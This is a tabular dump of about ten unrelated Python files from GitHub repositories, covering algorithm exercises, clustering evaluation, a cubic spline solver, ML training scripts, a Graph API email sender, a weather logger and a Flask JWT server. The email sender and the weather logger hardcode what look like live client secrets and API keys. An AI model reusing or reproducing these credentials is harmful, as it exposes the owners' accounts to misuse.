seq_id (stringlengths 7–11) | text (stringlengths 156–1.7M) | repo_name (stringlengths 7–125) | sub_path (stringlengths 4–132) | file_name (stringlengths 4–77) | file_ext (stringclasses, 6 values) | file_size_in_byte (int64, 156–1.7M) | program_lang (stringclasses, 1 value) | lang (stringclasses, 38 values) | doc_type (stringclasses, 1 value) | stars (int64, 0–24.2k, ⌀ = null) | dataset (stringclasses, 1 value) | pt (stringclasses, 1 value) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
706855437
|
def delit(a):
res = []
i = 1
while i * i < a + 1:
if a % i == 0:
res.append(i)
if i != a // i:
res.append(a // i)
i += 1
    return sorted(res) # Returns the divisors of the number a
print(delit(48))
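# Expected output for 48: [1, 2, 3, 4, 6, 8, 12, 16, 24, 48]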
|
Apersant1/Algorithms-for-EGE
|
task25INFO.py
|
task25INFO.py
|
py
| 281 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
31111080784
|
#https://leetcode.com/problems/longest-consecutive-sequence/submissions/
"""
Q)Given an unsorted array of integers, find the length of the longest
consecutive elements sequence.
1) Build a set of the numbers and iterate over the array.
2) For every element i, if i-1 is not in the set, start a new run with curr = i
and curr_streak = 1.
3) While curr+1 is in the set, increment curr and curr_streak.
4) Update the longest streak.
Time Complexity: O(n) amortised
Space Complexity: O(n)
"""
def longestConsecutive(nums):
num_set = set(nums)
longest_streak=0
for i in nums:
if i-1 not in num_set:
curr=i
curr_streak=1
while curr+1 in num_set:
curr+=1
curr_streak+=1
longest_streak=max(longest_streak, curr_streak)
return longest_streak
nums = [4,5,6,345,7,5,8,12,9]
print(longestConsecutive(nums))
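# Expected output: 6 (the consecutive run 4, 5, 6, 7, 8, 9)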
|
sparsh-m/30days
|
d4_3.py
|
d4_3.py
|
py
| 830 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8599562923
|
import webbrowser
import msal
import logging
import requests
import json
from msal import PublicClientApplication
APPLICATION_ID = '31a4641c-9cae-4d30-a2d4-c104bf383785'
CLIENT_SECRET = '5M78Q~QVl-rib2HqHVJ4xhRe-XWcGySwtZMgPbjz'
authority_url = 'https://login.microsoftonline.com/common/'
base_url = 'https://graph.microsoft.com/v1.0/'
endpoint = base_url + 'me'
SCOPES = ['User.Read', 'User.Export.All']
#
# # method 2: Login to acquire access_token
#
# client = PublicClientApplication(client_id=APPLICATION_ID,
# authority=authority_url)
#
# flow = client.initiate_device_flow(scopes=SCOPES)
# print(flow['user_code'])
# webbrowser.open(flow['verification_uri'])
#
# token_response = client.acquire_token_by_device_flow(flow)
# print(token_response['access_token'])
def email_sender(destinatario, nome_superior=None, nome_demitido=None, dt_demissao=None, modelo_equipamento=None, patrimonio_equipamento=None):
f = open('parameters.json')
config = json.load(f)
app = msal.ConfidentialClientApplication(
config["client_id"], authority=config["authority"],
client_credential=config["secret"],
# token_cache=... # Default cache is in memory only.
# You can learn how to use SerializableTokenCache from
# https://msal-python.rtfd.io/en/latest/#msal.SerializableTokenCache
)
# The pattern to acquire a token looks like this.
result = None
# Firstly, looks up a token from cache
# Since we are looking for token for the current app, NOT for an end user,
# notice we give account parameter as None.
result = app.acquire_token_silent(config["scope"], account=None)
if not result:
logging.info("No suitable token exists in cache. Let's get a new one from AAD.")
result = app.acquire_token_for_client(scopes=config["scope"])
if "access_token" in result:
# Calling graph using the access token
request_body = {
'message': {
# recipient list
'toRecipients': [
{
'emailAddress': {
'address': f'{destinatario}'
}
}
],
# email subject
'subject': 'TESTE - Transferência de Equipamentos',
'importance': 'normal',
'body': {
'contentType': 'HTML',
'content': f'<b>Prezado {nome_superior}, \n ex-colaborador:{nome_demitido} desligado em '
f'{dt_demissao}, favor 'f'transferir equipamento{modelo_equipamento},'
f' patrimônio {patrimonio_equipamento}'f' para outro colaborador ativo</b>'
},
}
}
graph_response = requests.post(config['endpoint'],
headers={'Authorization': 'Bearer ' + result['access_token']}, json=request_body)
print("Graph API call result: ")
print(graph_response)
else:
print(result.get("error"))
print(result.get("error_description"))
print(result.get("correlation_id")) # You may need this when reporting a bug
# request_body = {
# 'message': {
# # recipient list
# 'toRecipients': [
# {
# 'emailAddress': {
# 'address': '<recipient email address>'
# }
# }
# ],
# # email subject
# 'subject': 'You got an email',
# 'importance': 'normal',
# 'body': {
# 'contentType': 'HTML',
# 'content': '<b>Be Awesome</b>'
# },
# # include attachments
# 'attachments': [
# draft_attachment('hello.txt'),
# draft_attachment('image.png')
# ]
# }
# }
if __name__ == '__main__':
email_sender('[email protected]')
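# The function above reads its settings from parameters.json. A minimal sketch of the shape it
# appears to expect, inferred from the config[...] keys used in email_sender (every value below
# is a placeholder assumption, not taken from the original project):
# {
#     "client_id": "<application id>",
#     "authority": "https://login.microsoftonline.com/<tenant id>",
#     "secret": "<client secret>",
#     "scope": ["https://graph.microsoft.com/.default"],
#     "endpoint": "https://graph.microsoft.com/v1.0/users/<sender>/sendMail"
# }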
|
tvcastro1/projetos-analise-dados
|
citrix-podio/demitidos/emailer.py
|
emailer.py
|
py
| 3,963 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5140782550
|
# Requirements:
# Device needs to lock on to their system
# Add subroutine to detect a start-of-the-packet marker
# Four chars that are all different
# Find number of characters from the beginning of the buffer to the end of first four-char marker
class DayFive:
def __init__(self):
text_file = open("../inputs/daySix.txt", 'r')
self.data = text_file.read()
text_file.close()
def say_state(self):
print("Data split {}".format(self.dataSplit))
def separate(self):
data_split = list(self.data)
n = 3
print("len(data_split) {}".format(len(data_split)))
print("data_split {}".format(data_split))
while n < len(data_split):
one = data_split[n - 3]
two = data_split[n - 2]
three = data_split[n - 1]
four = data_split[n]
print("values {} {} {} {}".format(one, two, three, four))
if one == two or one == three or one == four or two == three or two == four or three == four:
print("n {}".format(n))
else:
print("Result {}".format(n + 1))
return n
n += 1
def separate_two(self):
start = 0
end = start + 15
while end <= len(self.data):
data_split = list(self.data[start:end])
one = data_split[0]
two = data_split[1]
three = data_split[2]
four = data_split[3]
five = data_split[4]
six = data_split[5]
seven = data_split[6]
eight = data_split[7]
nine = data_split[8]
ten = data_split[9]
eleven = data_split[10]
twelve = data_split[11]
thirteen = data_split[12]
fourteen = data_split[13]
if one == two or one == three or one == four or one == five or one == six or one == seven or one == eight or one == nine or one == ten or one == eleven or one == twelve or one == thirteen or one == fourteen:
print("one {}".format(data_split))
elif two == three or two == four or two == five or two == six or two == seven or two == eight or two == nine or two == ten or two == eleven or two == twelve or two == thirteen or two == fourteen:
print("two {}".format(data_split))
elif three == four or three == five or three == six or three == seven or three == eight or three == nine or three == ten or three == eleven or three == twelve or three == thirteen or three == fourteen:
print("three {}".format(data_split))
elif four == five or four == six or four == seven or four == eight or four == nine or four == ten or four == eleven or four == twelve or four == thirteen or four == fourteen:
print("four {}".format(data_split))
elif five == six or five == seven or five == eight or five == nine or five == ten or five == eleven or five == twelve or five == thirteen or five == fourteen:
print("five {}".format(data_split))
elif six == seven or six == eight or six == nine or six == ten or six == eleven or six == twelve or six == thirteen or six == fourteen:
print("six {}".format(data_split))
elif seven == eight or seven == nine or seven == ten or seven == eleven or seven == twelve or seven == thirteen or seven == fourteen:
print("seven {}".format(data_split))
elif eight == nine or eight == ten or eight == eleven or eight == twelve or eight == thirteen or eight == fourteen:
print("eight {}".format(data_split))
elif nine == ten or nine == eleven or nine == twelve or nine == thirteen or nine == fourteen:
print("nine {}".format(data_split))
elif ten == eleven or ten == twelve or ten == thirteen or ten == fourteen:
print("ten {}".format(data_split))
elif eleven == twelve or eleven == thirteen or eleven == fourteen:
print("eleven {}".format(data_split))
elif twelve == thirteen or twelve == fourteen:
print("twelve {}".format(data_split))
elif thirteen == fourteen:
print("thirteen {}".format(data_split))
else:
print("Result {}".format(end - 1))
return end
start += 1
end += 1
if __name__ == '__main__':
day = DayFive()
print("Day five exercise!")
result = day.separate_two()
# print("Result".format(result))
|
nunenoriu/advent-of-code-2022
|
day01-10/daySix.py
|
daySix.py
|
py
| 4,579 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9063496529
|
# -*- coding: utf-8 -*-
# ---
# @Software: PyCharm
# @Site:
# @File: num_clustering.py
# @Author: Alan D.Chen
# @E-mail: [email protected]
# @Time: 2020, August 07
# ---
import pandas as pd
from sklearn.cluster import KMeans, MeanShift, AgglomerativeClustering, DBSCAN, spectral_clustering
from sklearn import metrics
from sklearn.metrics import calinski_harabasz_score
import matplotlib.pyplot as plt
from xml_extract2 import xml_extract
from DBSCAN2x import dbscanx
import numpy as np
from mean_shiftx import mean_shift
from k_meansx import mainx
from prettytable import PrettyTable
import math
path = '/home/alanc/Documents/faster-rcnn.pytorch-pytorch-1.0/data/VOCdevkit2007/VOC2007/Annotations'
m = num_items_selected = 500
Zdata = xml_extract(path, m)
## just for AgglomerativeClustering
linkages = ['ward', 'average', 'complete']
## just for spectral_clustering
## Convert into a matrix; the input must be a symmetric matrix
metrics_metrix = (-1 * metrics.pairwise.pairwise_distances(Zdata)).astype(np.int32)
metrics_metrix += -1 * metrics_metrix.min()
## SSE sum of the squared errors
sse_list = []
sse_list2 = []
sse_list3 = []
K = range(1, 15)
for k in range(1,15):
kmeans=KMeans(n_clusters=k)
kmeans.fit(Zdata)
    sse_list.append([k, kmeans.inertia_, 0]) # model.inertia_ returns the model's sum of squared errors; store it in the list
# Calculate the slope difference between the two sides of a point #
for i in range(1,13):
sse_list[i][2] = (sse_list[i][1]-sse_list[i-1][1])/(sse_list[i][0]-sse_list[i-1][0]) - (sse_list[i+1][1]-sse_list[i][1])/(sse_list[i+1][0]-sse_list[i][0])
for i in range(len(sse_list)-1):
    # take the first element and compare it with the remaining elements; swap positions if it is larger
for j in range(i+1,len(sse_list)):
if sse_list[i][2]>sse_list[j][2]:
temp=sse_list[j]
sse_list[j]=sse_list[i]
sse_list[i]=temp
#print("The best number for K-means clustering by SSE(sum of the squared errors) is ", sse_list[0][0])
## Silhouette coefficient
## silhouette_score & Calinski-Harabaz Index
clusters = range(2,15)
sc_scores = []
sc_scores2 = []
ac_scores = []
ac_scores2 = []
pc_scores = []
pc_scores2 = []
for k in clusters:
kmeans_model = KMeans(n_clusters=k).fit(Zdata)
ac_model = AgglomerativeClustering(linkage=linkages[2], n_clusters=k).fit(Zdata)
pc_model = spectral_clustering(metrics_metrix, n_clusters=k)
sc_score = metrics.silhouette_score(Zdata, kmeans_model.labels_,sample_size=10000, metric='euclidean')
sc_scores.append([k, sc_score])
sc_score2 = metrics.calinski_harabasz_score(Zdata, kmeans_model.labels_)
sc_scores2.append([k, sc_score2])
## Agglomerative
ac_score = metrics.silhouette_score(Zdata, ac_model.labels_, sample_size=10000, metric='euclidean')
ac_scores.append([k, ac_score])
ac_score2 = metrics.calinski_harabasz_score(Zdata, ac_model.labels_)
ac_scores2.append([k, ac_score2])
## spectral_clustering
pc_score = metrics.silhouette_score(Zdata, pc_model, sample_size=10000, metric='euclidean')
pc_scores.append([k, pc_score])
pc_score2 = metrics.calinski_harabasz_score(Zdata, pc_model)
pc_scores2.append([k, pc_score2])
for i in range(len(sc_scores)-1):
    # take the first element and compare it with the remaining elements; swap positions if it is smaller
for j in range(i+1,len(sc_scores)):
if sc_scores[i][1]<sc_scores[j][1]:
temp=sc_scores[j]
sc_scores[j]=sc_scores[i]
sc_scores[i]=temp
if sc_scores2[i][1] < sc_scores2[j][1]:
temp = sc_scores2[j]
sc_scores2[j] = sc_scores2[i]
sc_scores2[i] = temp
if ac_scores[i][1]<ac_scores[j][1]:
temp=ac_scores[j]
ac_scores[j]=ac_scores[i]
ac_scores[i]=temp
if ac_scores2[i][1] < ac_scores2[j][1]:
temp = ac_scores2[j]
ac_scores2[j] = ac_scores2[i]
ac_scores2[i] = temp
if pc_scores[i][1]<pc_scores[j][1]:
temp=pc_scores[j]
pc_scores[j]=pc_scores[i]
pc_scores[i]=temp
if pc_scores2[i][1] < pc_scores2[j][1]:
temp = pc_scores2[j]
pc_scores2[j] = pc_scores2[i]
pc_scores2[i] = temp
# if sc_scores3[i][1] < sc_scores3[j][1]:
# temp = sc_scores3[j]
# sc_scores3[j] = sc_scores3[i]
# sc_scores3[i] = temp
num_cluster, cluster_ids = mean_shift(Zdata, 70.0)
num_cluster_dbscanx = dbscanx(path, m)
# #print(sc_scores)
# print("The best number for K-means clustering by Silhouette Coefficient is ", sc_scores[0][0])
# #print(sc_scores2)
# print("The best number for K-means clustering by Calinski-Harabaz Index is ", sc_scores2[0][0])
#
# #print(ac_scores)
# print("The best number for Agglomerative clustering by Silhouette Coefficient is ", ac_scores[0][0])
# #print(ac_scores2)
# print("The best number for Agglomerative clustering by Calinski-Harabaz Index is ", ac_scores2[0][0])
#
# #print(pc_scores)
# print("The best number for Spectral clustering by Silhouette Coefficient is ", pc_scores[0][0])
# #print(pc_scores2)
# print("The best number for Spectral clustering by Calinski-Harabaz Index is ", pc_scores2[0][0])
#
# print("The best number for DBSCAN clustering is ", num_cluster_dbscanx)
num_clusterx = (sse_list[0][0] + sc_scores[0][0] + sc_scores2[0][0] + ac_scores[0][0] + ac_scores2[0][0]
+ pc_scores[0][0] + pc_scores2[0][0] + num_cluster_dbscanx)/8
num_clusterx = int(math.ceil(num_clusterx))
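# num_clusterx is the rounded-up mean of the eight cluster-count suggestions gathered above
# (SSE elbow, silhouette and Calinski-Harabasz for K-means, Agglomerative and Spectral, plus DBSCAN).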
#################################
x = PrettyTable(["Method for clustering", "Automatic presentation", "SSE(sum of the squared errors)", "Silhouette Coefficient", "Calinski-Harabaz Index"])
x.align["Method for clustering"] = "l" # Left align city names
x.padding_width = 1 # One space between column edges and contents (default)
x.add_row(["K-means/PAM",0,sse_list[0][0],sc_scores[0][0],sc_scores2[0][0]])
x.add_row(["Hierarchical",0, 0,ac_scores[0][0],ac_scores2[0][0]])
x.add_row(["Spectral",0,0,pc_scores[0][0],pc_scores2[0][0]])
x.add_row(["DBSCANx",num_cluster_dbscanx,0,0,0])
x.add_row(["Mean-shift", num_cluster, 0, 0,0])
print(x)
print("Based on the above information, the following suggestions by the clustering system are : \n ")
nx, centerx = mainx(num_clusterx)
print("Plan 1:\n", "Number of clusters(K-means/PAM):",nx,"\n Cluster center:")
for l in range(len(centerx)):
print(centerx[l])
print("Plan 2:\n", "Number of clusters(mean shift):",num_cluster,"\n Cluster center:")
for l in range(len(cluster_ids)):
print(cluster_ids[l])
|
Alan-D-Chen/CDIoU-CDIoUloss
|
anchor_generater/num_clustering.py
|
num_clustering.py
|
py
| 6,580 |
python
|
en
|
code
| 25 |
github-code
|
6
|
2894455012
|
import numpy as np
import matplotlib.pyplot as plt
def gaussEliminationLS( m, n, a, x):
for i in range(m-1):
for k in range(m):
            if abs(a[i][i]) < abs(a[k][i]):  # partial pivoting: swap rows when a larger pivot is found
for j in range(n):
temp= a[i][j]
a[i][j]= a[k][j]
a[k][j]= temp
for k in range(i+1,m):
term = a[k][i]/a[i][i]
for j in range(n):
a[k][j]= a[k][j]-term*a[i][j]
for i in range(m-1,-1,-1):
x[i] = a[i][n-1]
for j in range(i+1,n-1):
x[i] = x[i]-a[i][j]*x[j]
x[i]= x[i]/a[i][i]
return x
def cSCoeffCalc(n,h,sig,y,a,b,c,d):
for i in range(n):
d[i]=y[i]
b[i]=sig[i]/2.0
a[i]=(sig[i+1]-sig[i])/(h[i]*6.0)
c[i]=(y[i+1]-y[i])/h[i]-h[i]*(2*sig[i]+sig[i+1])/6.0
def tridiagonalCubicSplineGen(n,h,a,y):
for i in range(n-1):
a[i][i]=2*(h[i]+h[i+1])
for i in range(n-2):
a[i][i+1]=h[i+1]
a[i+1][i]=h[i+1]
for i in range(1,n):
a[i-1][n-1]=(y[i+1]-y[i])*6/h[i]-(y[i]-y[i-1])*6/h[i-1]
def printMatrix(m, n, matrix):
ss=""
for i in range(m):
for j in range(n):
ss+=str(matrix[i][j])+" "
print(ss);
def copyMatrix( m, n, matrix1, matrix2):
for i in range(m):
for j in range(n):
matrix2[i][j]=matrix1[i][j]
#x= np.array([-3,-2 ,-1, 0, 1, 2, 3])
#y= np.array([-1, -1, -1, 0, 1, 1, 1])
x= np.array([0,1,2.5,3.6,5,7,8.1,10])
y= np.array([0,.8,.6,-.44,-.96,.66,.97,-.54])
m= x.shape[0]
n= m-1
h = np.zeros((n,1))
for i in range(n):
h[i]=x[i+1]-x[i]
a = np.zeros((n,1))
b = np.zeros((n,1))
c = np.zeros((n,1))
d = np.zeros((n,1))
sig = np.zeros((n+1,1))
sigTemp = np.zeros((n-1,1))
sig[0]=0
sig[n]=0
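# Natural-spline boundary condition: the second derivatives (sig) vanish at both end points.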
tri = np.zeros((n-1,n))
tridiagonalCubicSplineGen(n,h,tri,y)
print("The tridiagonal system for the Natural spline is:\n\n")
printMatrix(n-1,n,tri)
# Perform Gauss Elimination
gaussEliminationLS(n-1,n,tri,sigTemp)
for i in range(1,n):
sig[i]=sigTemp[i-1]
# Print the values of Si's
for i in range(n+1):
print("\nSig["+str(i)+"]= " +str(sig[i]))
# calculate the values of ai's, bi's, ci's, and di's
cSCoeffCalc(n,h,sig,y,a,b,c,d);
print("The equations of cubic interpolation polynomials between the successive intervals are:\n\n")
for i in range(n):
print("P"+str(i)+"(x) b/w ["+str(x[i])+","+str(x[i+1])+"] = "+str(a[i])+"*(x-"+str(x[i])+")^3+"+str(b[i])+"*(x-"+str(x[i])+")^2+"+str(c[i])+"*(x-"+str(x[i])+")+"+str(d[i])+"\n")
function = lambda x: (a[i]*(x-x[i])**3+b[i]*(x-x[i])**2+c[i]*(x-x[i])+d[i])
X= np.linspace(x[i],x[i+1])
plt.plot(X,function(X))
plt.show()
|
meheraj2325/CSE-3212-Numerical-Methods-Lab
|
lab4/cubic_spline2.py
|
cubic_spline2.py
|
py
| 2,688 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30763331030
|
import sys
import torch
import ool.picture.models.thirdparty.space.model as spc
from ool.picture.models.thirdparty.space.model import Space
from oolexp import OOLLayeredBoxExp
class MultipleOptimizer(torch.optim.Optimizer):
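    # Thin wrapper that presents several torch optimizers as a single one:
    # zero_grad()/step()/state_dict() simply fan out to every wrapped optimizer.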
def __init__(self, *optimisers):
self.opts = optimisers
self.defaults = self.opts[0].defaults
self.state = self.opts[0].state
self.param_groups = []
for opt in self.opts:
self.param_groups.extend(opt.param_groups)
def __getstate__(self):
return {
'defaults': self.defaults,
'state': self.state,
'param_groups': self.param_groups,
}
def __setstate__(self, state):
self.__dict__.update(state)
def __repr__(self):
return f"Multi:{' '.join(str(opt) for opt in self.opts)}"
def state_dict(self):
return {
'opts': [
opt.state_dict() for opt in self.opts
]
}
def load_state_dict(self, state_dict):
        for opt, sd in zip(self.opts, state_dict['opts']):  # key must match state_dict() above
opt.load_state_dict(sd)
def zero_grad(self, set_to_none: bool = False):
for opt in self.opts:
opt.zero_grad(set_to_none)
    def step(self, closure=None):
for opt in self.opts:
opt.step(closure)
def add_param_group(self, param_group):
raise NotImplementedError()
class LitSPACE(OOLLayeredBoxExp):
def __init__(self,
tag='test',
seed=None,
data='clevr-crop-(128, 128)',
batch_size=16,
grad_clip=1.0,
# learning_rate=1e-4,
max_steps=160000,
fg_std = 0.15,
bg_std = 0.15,
):
super(LitSPACE, self).__init__(seed, 'mse', 'min')
self.save_hyperparameters()
spc.arch.fg_sigma = fg_std
spc.arch.bg_sigma = bg_std
self.model = Space()
def training_step(self, batch, batch_idx):
batch = self.accelated_batch_postprocessing(batch)
img, *other = batch
output = self.model(img, self.trainer.global_step)
self.maybe_log_training_outputs(output)
return output['loss']
def configure_optimizers(self):
adam = torch.optim.Adam(list(self.model.bg_module.parameters()), lr=1e-3)
rms = torch.optim.RMSprop(list(self.model.fg_module.parameters()), lr=1e-5)
return MultipleOptimizer(rms, adam)
# def trainer_kwargs(self):
# return dict(accumulate_grad_batches=3)
def validation_step(self, batch, batch_idx, dataloader_idx=None):
prefix = '' if dataloader_idx is None else f"v{dataloader_idx}/"
batch = self.accelated_batch_postprocessing(batch)
img, *other = batch
output = self.model(img, self.trainer.global_step)
self.maybe_log_validation_outputs(batch, batch_idx, output, prefix)
if __name__ == '__main__':
print(' '.join(sys.argv))
LitSPACE.parse_args_and_execute()
|
karazijal/clevrtex
|
experiments/space.py
|
space.py
|
py
| 3,054 |
python
|
en
|
code
| 8 |
github-code
|
6
|
39567195381
|
def main(filepath):
with open(filepath) as file:
rows = [int(x.strip())for x in file.readlines()]
for i in range(25,len(rows)):
condition_met = False
for j in range(i-25,i):
for k in range(i-25,i):
if (rows[k] + rows[j]) == rows[i] and not rows[k] == rows[j]:
condition_met = True
if not condition_met:
b_target = rows[i]
print("Part a solution: "+ str(b_target))
break
for i in range(len(rows)):
for j in range(i,len(rows)):
if sum(rows[i:j]) == b_target and not len(rows[i:j])==1:
print("Part b solution: "+ str(max(rows[i:j])+min(rows[i:j])))
|
Burntmace/AdventOfCode2020
|
AOC-2020/days/nine.py
|
nine.py
|
py
| 727 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6972201686
|
import os
import argparse
#from tools import train_net
from tools.lib import init_lr
import random
import numpy as np
from tools.classification import classification
from tools.classification_multi import classification_multi
import torch
def seed_torch(seed=0):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
#torch.backends.cudnn.enabled = False
seed_torch(0)
root_path = os.getcwd() #'/data2/lqm/pytorch_interpretable/py_icnn'
parser = argparse.ArgumentParser('parameters')
#info:gpu
parser.add_argument('--gpu_id',type=int,default=0,help='select the id of the gpu')
#info:task
parser.add_argument('--task_name',type=str,default='classification',help='select classification or classification_multi')
parser.add_argument('--task_id',type=int,default=0,help='0,1,2..')
parser.add_argument('--dataset',type=str,default='voc2010_crop',help='select voc2010_crop, helen, cub200,cubsample'
'celeba, vocpart, ilsvrcanimalpart')
parser.add_argument('--imagesize',type=int,default=224,help='')
parser.add_argument('--label_name',type=str,default='bird',help='if voc2010_crop, set bird, cat, cow, dog, horse or sheep;'
'else, it does not matter')
parser.add_argument('--label_num',type=int,default=1,help='keep the same number of label_name')
parser.add_argument('--model',type=str,default='resnet_18',help='select vgg_vd_16, vgg_m, vgg_s, '
'alexnet, resnet_18, resnet_50, densenet_121')
parser.add_argument('--losstype',type=str,default='logistic',help='select logistic or softmax')
#info:hyper-parameter
parser.add_argument('--batchsize',type=int,default=8,help='select more than 8 may cause out of cuda memory, '
'when you want to choose different batchsize, you also need to adjust line 94 of /tools/sgd.py at the same time to make them consistent')
parser.add_argument('--dropoutrate',type=float,default=0,help='select a number between 0 and 1')
parser.add_argument('--lr',type=float,default=0,help='see function init_lr in /tools/lib.py for details')
parser.add_argument('--epochnum',type=int,default=0,help='see function init_lr in /tools/lib.py for details')
parser.add_argument('--weightdecay',type=float,default=0.0005,help='0.02,0.002')
parser.add_argument('--momentum',type=float,default=0.09,help='0.02,0.002')
args = parser.parse_args()
args.lr, args.epochnum = init_lr(args.model,args.label_num,args.losstype) #init lr and epochnum
if(args.task_name=='classification'):
if args.dataset == 'celeba':
args.label_num = 40
classification(root_path, args)
else:
if args.dataset == 'vocpart':
args.label_name = ['bird','cat','cow','dog','horse','sheep']
args.label_num = 6
classification_multi(root_path,args)
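# Hypothetical invocation (flag names and values come from the parser defaults above):
#   python demo.py --gpu_id 0 --task_name classification --dataset voc2010_crop --label_name bird --model resnet_18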
|
ada-shen/ICNN
|
demo.py
|
demo.py
|
py
| 3,178 |
python
|
en
|
code
| 59 |
github-code
|
6
|
3438970081
|
import sys
from typing import List
class Solution:
def minCostII(self, costs: List[List[int]]) -> int:
k = len(costs[0])
dp1 = [0] * k
dp2 = [0] * k
smallest1 = [0] * 2
smallest2 = [sys.maxsize] * 2
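        # smallest*[1] tracks the minimum cost of the previous row and smallest*[0] the
        # second-smallest; the second-smallest is used when the cheapest previous house
        # was painted the same color i, so adjacent houses never share a color.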
for cost in costs:
for i in range(k):
if dp1[i] == smallest1[1]:
dp2[i] = cost[i] + smallest1[0]
else:
dp2[i] = cost[i] + smallest1[1]
if dp2[i] <= smallest2[1]:
smallest2[0] = smallest2[1]
smallest2[1] = dp2[i]
elif dp2[i] < smallest2[0]:
smallest2[0] = dp2[i]
dp1 = dp2
dp2 = [0] * k
smallest1 = smallest2
smallest2 = [sys.maxsize] * 2
return min(dp1)
|
cuiy0006/Algorithms
|
leetcode/265. Paint House II.py
|
265. Paint House II.py
|
py
| 833 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20804943026
|
import pickle
from sklearn import model_selection
from sklearn.linear_model import LinearRegression
model = LinearRegression()
loaded_model = pickle.load(open('model', 'rb'))
val = "sssfAfsDfe%%%{dInIisdChdh*e]DHSdbeTNhfhdyeSSWTTFSSSllfjdjs{\\#3fdas34df7adJHHstcsdDFur3sfj_1mdfneypcs0KJDsrsFs7sd4nfec3_sdrufdl35}453"
print(len(val))
res = ""
for pos, i in enumerate(loaded_model.coef_):
print(i)
if i == 1:
res += val[pos]
print(res)
print(len(loaded_model.coef_))
print(loaded_model)
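# The saved model's coefficients act as a 0/1 mask over val: positions whose coefficient
# equals 1 contribute their character to the recovered string res.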
|
MysterionRise/ai-ctf-2022-solutions
|
stegano-regression/stegano.py
|
stegano.py
|
py
| 502 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73486867709
|
'''
@Jailson
Date: 17-11-2022
'''
import requests
from csv import writer
from datetime import datetime
data_e_hora_atuais = datetime.now()
data_e_hora_em_texto = data_e_hora_atuais.strftime('%d/%m/%Y %H:%M')
#################################################################################
# Emon service info
emon_ip = "193.136.227.157"
emon_apikey = "95ca8292ee40f87f6ff0d1a07b2dca6f" # emon ecopool
node_id = "ecopool"
##################################################################################
API_KEY = "23ffbe727b2bee451d3dc7b37ad2b813"
API_KEY_PRO = "5c27c543425c4d4a1efc3c6bee965937"
cidade = "faro"
code = "351"
link = "https://api.openweathermap.org/data/2.5/forecast?q="+str(cidade)+"&appid="+str(API_KEY)
def main():
    requisicao = requests.get(link) # makes the request to the site (API)
    requisicao_dic = requisicao.json() # stores the requested values in a dictionary
print(requisicao_dic)
temp = requisicao_dic['list'][0]['main']['temp'] - 273.15
humidade = requisicao_dic['list'][0]['main']['humidity']
veloc_vent = ((requisicao_dic['list'][0]['wind']['speed']) / (1000)) * 3600
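    # OpenWeatherMap returns the temperature in Kelvin (hence the 273.15 offset above)
    # and the wind speed in m/s, which is converted to km/h here.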
velocidade = '{:.0f}'.format(veloc_vent)
temperatura = '{:.0f}'.format(temp)
#print(temperatura,velocidade,humidade)
    # send to emoncms
data_json = '{"TemperaturaExt":' + str(temperatura) + ',"HumidadeExt":' + str(humidade) + ',"VelocidadeExt":' + str(velocidade) +'}'
emon_link = 'http://' + emon_ip + '/emoncms/input/post?node=' + node_id + '&fulljson=' + str(data_json) + "&apikey=" + str(emon_apikey)
request = requests.get(emon_link)
    # send to a csv file
# The data assigned to the list
list_data = [data_e_hora_em_texto,temperatura, velocidade, humidade]
with open('files/files.csv', 'a', newline='') as f_object:
# Pass the CSV file object to the writer() function
writer_object = writer(f_object)
# Result - a writer object
# Pass the data in the list as an argument into the writerow() function
writer_object.writerow(list_data)
# Close the file object
f_object.close()
if __name__ == "__main__":
main()
|
marcelo-m7/EcoPool
|
varexternas.py
|
varexternas.py
|
py
| 2,070 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31534411526
|
characters = input()
command = input()
while command != "End":
command = command.split()
the_command = command[0]
if the_command == "Translate":
char = command[1]
replacement = command[2]
if char in characters:
characters = characters.replace(char, replacement)
print(characters)
elif the_command == "Includes":
substring = command[1]
if substring in characters:
print("True")
elif substring not in characters:
print("False")
elif the_command == "Start":
substring = command[1]
if characters[:len(substring)] == substring:
print("True")
else:
print("False")
elif the_command == "Lowercase":
characters = characters.lower()
print(characters)
elif the_command == "FindIndex":
char = command[1]
index = characters.rfind(char)
print(index)
elif the_command == "Remove":
start_index = int(command[1])
count = int(command[2])
characters = characters.replace(characters[start_index:start_index+count], "")
print(characters)
command = input()
|
iliyan-pigeon/Soft-uni-Courses
|
programming_fundamentals_python/exams/fundamentals_the_final_exam/string_manipulator.py
|
string_manipulator.py
|
py
| 1,188 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23748731008
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Entry point for the server application."""
import json
import logging
import traceback
from datetime import datetime
from flask import Response, jsonify, current_app
from flask_jwt_simple import (JWTManager, jwt_required, get_jwt_identity, get_jwt)
from gevent.wsgi import WSGIServer
from backend.flask_app.api.user import user
from backend.flask_app.api.home import home
from .factory import create_app, create_user
from .http_codes import Status
logger = logging.getLogger(__name__)
app = create_app()
jwt = JWTManager(app)
@app.before_first_request
def init():
"""Initialize the application with defaults."""
create_user(app)
@jwt.jwt_data_loader
def add_claims_to_access_token(identity):
"""Explicitly set identity and claims for jwt."""
print("identita data loader %s" % identity)
if identity == '[email protected]':
roles = 'admin'
else:
roles = 'user'
now = datetime.utcnow()
return {
'exp': now + current_app.config['JWT_EXPIRES'],
'iat': now,
'nbf': now,
'sub': identity,
'roles': roles
}
def main():
"""Main entry point of the app."""
try:
port = 8080
ip = '0.0.0.0'
http_server = WSGIServer((ip, port), app,log=logging,error_log=logging)
print("Server started at: {0}:{1}".format(ip, port))
http_server.serve_forever()
except Exception as exc:
# logger.error(exc.message)
logger.exception(traceback.format_exc())
finally:
        # Do something here, e.g. render some kind of main view
pass
@app.route('/', methods=['GET'])
def test_connection():
ret = {'msg': 'Is okey'}
return jsonify(ret), 200
app.register_blueprint(user, url_prefix='/api/user')
app.register_blueprint(home, url_prefix='/api/home')
|
zIPjahoda/Flask-Angular
|
backend/flask_app/server.py
|
server.py
|
py
| 1,852 |
python
|
en
|
